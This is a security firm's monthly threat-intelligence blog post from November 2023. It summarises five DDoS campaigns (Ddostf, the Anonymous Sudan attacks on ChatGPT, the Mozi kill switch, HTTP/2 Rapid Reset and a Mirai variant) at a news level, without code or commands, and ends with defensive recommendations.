Top 5 Infamous DDoS Attacks Dominating the Cyber Landscape (November 2023)

At SISA, we understand the ever-evolving nature of cyber threats and the importance of staying one step ahead to protect your organization’s sensitive data and assets. Our dedicated team of experts is constantly monitoring various platforms, gathering intelligence, and analyzing the latest cyber threats to provide valuable insights into the latest cyber risks that can impact organizations.

This monthly post provides a condensed overview of the threats encountered throughout the month.

Our team brings to you five infamous Distributed Denial-of-Service (DDoS) attacks that are dominating the cyber landscape including Ddostf botnet exploiting MySQL servers, ChatGPT outages due to attacks by Anonymous Sudan, mysterious kill switch disrupting Mozi botnet operations, HTTP DDoS attacks leveraging the HTTP/2 Rapid Reset flaw, and Mirai botnet augmenting functionalities with 13 new exploits.

Read on to discover more…

1. Ddostf DDoS-as-a-Service botnet focuses on exploiting MySQL servers

The ‘Ddostf’ malware botnet is actively targeting MySQL servers, aiming to transform them into a DDoS-as-a-Service platform leased to cybercriminals. Researchers discovered this campaign during routine monitoring of database server threats. The botnet operators exploit vulnerabilities in unpatched MySQL environments or use brute-force techniques to compromise servers, particularly targeting exposed MySQL servers on the internet.

They abuse user-defined functions (UDFs) in MySQL to execute malicious commands, download payloads like the Ddostf DDoS bot, and potentially engage in activities such as malware installation, data exfiltration, and backdoor creation. This tactic allows the Ddostf botnet to establish persistence on Windows systems by registering itself as a system service and evade takedowns by connecting to new command and control (C2) addresses.

2. DDoS attacks behind recent ChatGPT outages, confirms OpenAI

OpenAI recently faced intermittent service disruptions due to DDoS attacks on its API and ChatGPT services, causing errors such as “something seems to have gone wrong” for users. These disruptions followed a series of outages, including a major ChatGPT outage that affected its API, partial ChatGPT outages, and elevated error rates in Dall-E. Although OpenAI has not officially attributed these outages to a specific cause, Anonymous Sudan, a threat actor, claimed responsibility for the DDoS attacks.

The group cited OpenAI’s perceived bias towards Israel and against Palestine as the motivation behind these attacks. Anonymous Sudan mentioned utilizing the SkyNet botnet, which now supports application layer attacks (Layer 7 DDoS attacks) and was previously involved in attacks on Microsoft services like Outlook.com, OneDrive, and Azure Portal in June. Microsoft labeled the activity as Storm-1359, detailing three types of Layer 7 DDoS attacks employed by Anonymous Sudan: HTTP(S) flood attacks, Cache bypass, and Slowloris.

3. Mysterious kill switch disrupts Mozi DDoS botnet operations

The Mozi malware botnet, known for its targeted DDoS attacks on IoT devices since 2019, recently saw a decline in activity but also experienced a significant event. An unidentified source sent a kill switch payload, deactivating all bots within the network. Cybersecurity researchers observed a decline in Mozi’s operations, starting with a cessation in India, followed by a halt in its origin country, China. The event involved dispatching eight UDP messages instructing the bots to download an update, which led to a sequence of actions including process termination, service disabling, file replacement, configuration changes, and establishing connections to a remote server, marking a meticulous takedown effort.

An analysis noted striking similarities between the original Mozi code and the takedown binaries, raising speculations about potential involvement from the original creators or Chinese law enforcement, although concrete attribution remains unclear. Despite Mozi’s offline status, the cybersecurity landscape continues to face threats from various DDoS malware botnets targeting vulnerable IoT devices, highlighting the ongoing importance of prioritizing device security.

4. 100 million RPS DDoS attack exploits HTTP/2 Rapid Reset flaw

Cloudflare mitigated thousands of hyper-volumetric HTTP DDoS attacks leveraging the newly exposed HTTP/2 Rapid Reset flaw, with 89 of these attacks surpassing 100 million requests per second (RPS). The vulnerability (CVE-2023-44487), disclosed after industry research on DDoS attacks, targeted AWS, Cloudflare, Google Cloud, and Fastly, which faced an attack reaching 250 million RPS for three minutes. This campaign led to a 65% spike in Q3’s HTTP DDoS attack traffic, totaling 8.9 trillion requests compared to 5.4 trillion in Q2 2023 and 4.7 trillion in Q1 2023.

Cloud-based botnets exploiting this vulnerability could amplify attacks by 5,000 times per node, significantly impacting industries like gaming, IT, cryptocurrency, software, and telecom. While the U.S., China, Brazil, Germany, and Indonesia are major sources of application layer (L7) DDoS attacks, the U.S., Singapore, China, Vietnam, and Canada are primary targets of HTTP DDoS attacks.

5. Mirai DDoS malware variant expands targets with 13 router exploits

The IZ1H9 variant of the Mirai botnet has augmented its functionalities by integrating 13 new exploit payloads targeting a diverse array of Linux-based IoT devices like routers, IP cameras, and others. These exploits specifically aim at vulnerabilities within devices from major manufacturers like D-Link, TP-Link, Zyxel, Netis, Sunhillo SureLine, Geutebruck, Yealink Device Management, Zyxel, TP-Link Archer, Korenix JetWave, and TOTOLINK.

Spanning from 2015 to 2023, the exploits encompass numerous vulnerabilities, with a focus on command execution flaws in D-Link, Geutebruck, Netis WF2419 (CVE-2019-19356), Korenix JetWave (CVE-2023-23295), Sunhillo SureLine (CVE-2021-36380), and a multitude of command execution vulnerabilities in TOTOLINK routers. Once a vulnerability is exploited, the botnet injects a payload directing the device to fetch and execute a shell script downloader, erasing logs to conceal its presence. It then sets up bot clients to communicate with a Command-and-Control server, enabling various DDoS attacks like UDP, UDP Plain, HTTP Flood, and TCP SYN attacks.

Key recommendations to combat cyber risks

• Enroll in a DDoS (Cloud) mitigation protection service and develop DDoS response and business continuity plans.
• Enforce strong and unique passwords for administrator accounts to defend against brute-force and dictionary attacks.
• Regularly update the firmware on IoT devices. Manufacturers often release patches to address vulnerabilities, so keeping the devices up to date is crucial.
• Implement robust monitoring to detect and respond to unauthorized access attempts Regularly audit server access logs.
• Implement network segmentation to restrict the lateral movement of malware within the network, isolating critical systems from potential threats.
• Deploy robust endpoint protection solutions to detect and mitigate malware infections on both Linux and Windows systems.
• Install reputable security software on the devices, including antivirus and anti-malware programs, to provide an additional layer of protection.
• Frequently back up data to mitigate the impact of a potential attack. Ensure that backups are stored securely and are regularly tested for restoration.
• Conduct routine vulnerability assessments and scans to identify potential weaknesses in network and devices.
• Conduct a DDoS tabletop exercise and/or regularly test your DDoS response plan.